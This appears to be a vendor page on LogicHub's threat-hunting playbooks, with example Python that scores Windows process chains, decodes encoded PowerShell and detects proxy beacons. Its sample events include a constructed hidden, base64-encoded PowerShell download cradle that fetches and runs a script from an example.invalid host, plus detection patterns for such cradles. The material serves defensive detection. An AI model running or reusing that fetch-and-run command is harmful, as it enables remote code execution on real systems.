LogicHub is continuously developing new threat detection and threat hunting content, categorized and mapped to the MITRE ATT&CK framework: a globally accessible knowledge base of adversary tactics and techniques, based on real-world observations and maintained by the MITRE Corporation.
Windows Process Creation Monitoring
After an adversary has compromised a system in your network, they will try to move laterally: first discovering what other systems and services are in place, then looking for further vulnerabilities and assets to steal or compromise. As part of this movement they run processes on Windows endpoints, and those processes are recorded in Windows process creation logs (Security event ID 4688, or Sysmon event ID 1, which also captures the parent process and full command line; note that 4688 only includes the command line when the "Include command line in process creation events" policy is enabled). Millions of these events are likely already being generated and collected. The truly suspicious and malicious ones, however, are easily missed in the noise of normal activity.
LogicHub has refined and automated hundreds of threat hunting detection patterns and techniques and mapped them to the MITRE ATT&CK framework. Some major capabilities in this pre-built playbook include:
- Process Chain Monitoring: reconstructs the parent-child sequence of process executions ("process chains") from process creation logs, then uses a machine learning algorithm to compare each chain against known good and known bad behavior, including abuse of "Living Off the Land Binaries" ("LOLBins": built-in Windows executables such as powershell.exe, rundll32.exe and certutil.exe that attackers and malicious code routinely use), to predict whether a particular chain is likely to be malicious.
- Automated PowerShell Command Triage: decodes and de-obfuscates PowerShell command lines (such as base64-encoded commands) and analyzes them against hundreds of patterns and a machine learning classifier trained on your organization's data.
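As an added illustration of the two capabilities above (example code written for this page, not LogicHub's playbook, which is not published here), the following Python reconstructs parent-child process chains from constructed Sysmon-style process creation events, scores each chain with a hand-written heuristic that stands in for the machine learning comparison, and decodes and pattern-matches a base64 `-EncodedCommand` PowerShell command line. The LOLBin list, the pattern weights, the sample events and the `example.invalid` URL are all assumptions made for the example.

```python
import base64
import binascii
import ntpath
import re

# Illustrative subset of Windows-native binaries that attackers routinely abuse (LOLBins).
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "certutil.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe"}
# Document handlers that have little legitimate reason to spawn a shell or script host.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Patterns applied to the command line (encoded blob stripped) plus its decoded payload;
# each hit adds its weight. Weights are assumptions for this example.
PS_PATTERNS = [
    (r"(?i)\b(iex|invoke-expression)\b", 3, "invoke-expression"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3, "download cradle"),
    (r"(?i)-w(indowstyle)?\s+hidden", 2, "hidden window"),
    (r"(?i)-nop(rofile)?\b", 1, "no profile"),
    (r"(?i)\bbypass\b", 1, "execution policy bypass"),
    (r"(?i)frombase64string|\[char\]", 2, "string obfuscation"),
]

# Constructed sample payload and events (Sysmon event 1 style fields); not real telemetry.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENC = base64.b64encode(SCRIPT.encode("utf-16le")).decode()  # how -EncodedCommand is built
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start /min powershell"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {ENC}"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand (base64 of UTF-16LE) argument, or None."""
    for m in re.finditer(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", cmdline):
        flag = m.group(1).lower()
        # PowerShell accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) and the alias -ec.
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def triage_powershell(cmdline):
    """Decode the command line if needed and score it against PS_PATTERNS."""
    decoded = decode_encoded_command(cmdline)
    # Replace long base64 runs so pattern hits come from real tokens, not from the blob.
    text = re.sub(r"[A-Za-z0-9+/=]{40,}", "<b64>", cmdline)
    hits, score = [], 0
    if decoded:
        text += "\n" + decoded
        hits.append("encoded command")
        score += 2
    for pattern, weight, label in PS_PATTERNS:
        if re.search(pattern, text):
            hits.append(label)
            score += weight
    return {"decoded": decoded, "hits": hits, "score": score}


def build_chains(events):
    """Map each pid to its ancestry as a list of lower-cased image basenames, root first."""
    by_pid = {e["pid"]: e for e in events}
    chains = {}
    for pid in by_pid:
        chain, cur, seen = [], pid, set()
        while cur in by_pid and cur not in seen:  # stop at an unknown parent or a pid-reuse loop
            seen.add(cur)
            chain.append(ntpath.basename(by_pid[cur]["image"]).lower())
            cur = by_pid[cur]["ppid"]
        chains[pid] = list(reversed(chain))
    return chains


def score_chain(chain):
    """Heuristic chain score; the playbook's learned model would take this role."""
    score, reasons = 0, []
    for parent, child in zip(chain, chain[1:]):
        if parent in OFFICE_APPS and child in LOLBINS:
            score += 5
            reasons.append(f"{parent} spawned {child}")
        elif parent in LOLBINS and child in LOLBINS:
            score += 2
            reasons.append(f"{parent} -> {child}")
    return score, reasons


def analyze(events):
    """Score every process; PowerShell leaves also get command-line triage. Highest score first."""
    chains = build_chains(events)
    findings = []
    for e in events:
        chain = chains[e["pid"]]
        score, reasons = score_chain(chain)
        if chain[-1] in {"powershell.exe", "pwsh.exe"}:
            ps = triage_powershell(e["cmdline"])
            score += ps["score"]
            reasons += ps["hits"]
        if score:
            findings.append({"pid": e["pid"], "chain": " > ".join(chain),
                             "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f["score"], f["chain"], f["reasons"])
```

Run against real data by mapping Sysmon event 1 (or 4688) records onto the `pid`, `ppid`, `image` and `cmdline` fields; the chain for the Word document that spawns cmd.exe and then a hidden, encoded PowerShell download cradle rises to the top, while explorer.exe launching notepad.exe scores zero and never appears.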
The Windows Process Creation Events playbook separates out truly suspicious and malicious events as an experienced threat hunting team would, backed by automated analysis. It shortcuts months of detection content development and tuning by automatically tuning out most of the noise present in the deployed environment.
Proxy Beacon Detection
One of the many use cases that LogicHub customers have implemented and benefited from is that of automating threat hunting in web proxy logs.
Beacons are the periodic check-ins an implant makes to its command-and-control server; in web proxy logs they show up as repeated requests from one host to one destination at near-constant intervals, often with near-constant response sizes. Automated hunting in proxy logs with LogicHub is a powerful and easy start to a threat hunting campaign: it reduces the noise by surfacing the smaller subset of riskier entries, such as these beacon-like connection patterns, for analysts to focus on.
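As an added example of the beacon-hunting idea (written for this page; it is not LogicHub's proxy playbook), the Python below groups constructed proxy log lines by source and destination, measures how regular the inter-request gaps and response sizes are, and flags pairs whose timing is too regular for human browsing. The log format, the thresholds, the host names under `example.invalid` and the timestamps are all assumptions made for the example.

```python
import statistics
from collections import defaultdict

# Constructed proxy log lines (not real traffic): "<epoch> <src_ip> <dest_host> <method> <status> <bytes>".
# 10.0.0.5 phones home to updates.example.invalid about every 60 s with a little jitter, and also
# browses news.example.invalid at irregular, human-looking intervals; 10.0.0.7 makes three requests.
_T0 = 1700000000
BEACON_TIMES = [_T0 + 60 * i + j for i, j in enumerate([0, 1, -2, 2, 0, -1, 1, 0, 2, -1, 0, 1])]
BROWSE_TIMES = [_T0 + t for t in (0, 3, 4, 180, 181, 183, 900, 2400, 2401, 2402, 3000, 5000)]
LOG_LINES = (
    [f"{t} 10.0.0.5 updates.example.invalid GET 200 312" for t in BEACON_TIMES]
    + [f"{t} 10.0.0.5 news.example.invalid GET 200 {40000 + 97 * i}" for i, t in enumerate(BROWSE_TIMES)]
    + [f"{t} 10.0.0.7 news.example.invalid GET 200 1024" for t in BROWSE_TIMES[:3]]
)


def parse_line(line):
    """Parse one constructed proxy log line into a record."""
    ts, src, host, method, status, size = line.split()
    return {"ts": int(ts), "src": src, "host": host, "method": method,
            "status": int(status), "bytes": int(size)}


def beacon_stats(timestamps, sizes):
    """Regularity of a (src, host) pair: coefficient of variation of inter-request gaps and sizes."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean_gap = statistics.mean(gaps)
    mean_size = statistics.mean(sizes)
    # A low coefficient of variation means the gaps (or sizes) barely change between requests.
    gap_cv = statistics.stdev(gaps) / mean_gap if mean_gap else float("inf")
    size_cv = statistics.stdev(sizes) / mean_size if mean_size else float("inf")
    return {"period": mean_gap, "gap_cv": gap_cv, "size_cv": size_cv}


def detect_beacons(lines, min_requests=8, max_gap_cv=0.2):
    """Return (src, host) pairs whose request timing is regular enough to look like a beacon."""
    groups = defaultdict(list)
    for rec in map(parse_line, lines):
        groups[(rec["src"], rec["host"])].append(rec)
    findings = []
    for (src, host), recs in groups.items():
        if len(recs) < min_requests:  # too few samples to judge periodicity
            continue
        stats = beacon_stats([r["ts"] for r in recs], [r["bytes"] for r in recs])
        if stats["gap_cv"] <= max_gap_cv:
            findings.append({"src": src, "host": host, "count": len(recs), **stats})
    return sorted(findings, key=lambda f: f["gap_cv"])


if __name__ == "__main__":
    for f in detect_beacons(LOG_LINES):
        print(f"{f['src']} -> {f['host']}: {f['count']} requests, period {f['period']:.1f}s, "
              f"gap cv {f['gap_cv']:.3f}, size cv {f['size_cv']:.3f}")
```

The minimum request count matters as much as the variance threshold: with only a handful of requests almost any pair can look periodic, so the example refuses to judge the three-request host at all. On real logs, bucketing by hour and adding the size variation to the score helps separate implants with randomized sleep jitter from legitimate software update checks, which tend to be both periodic and large.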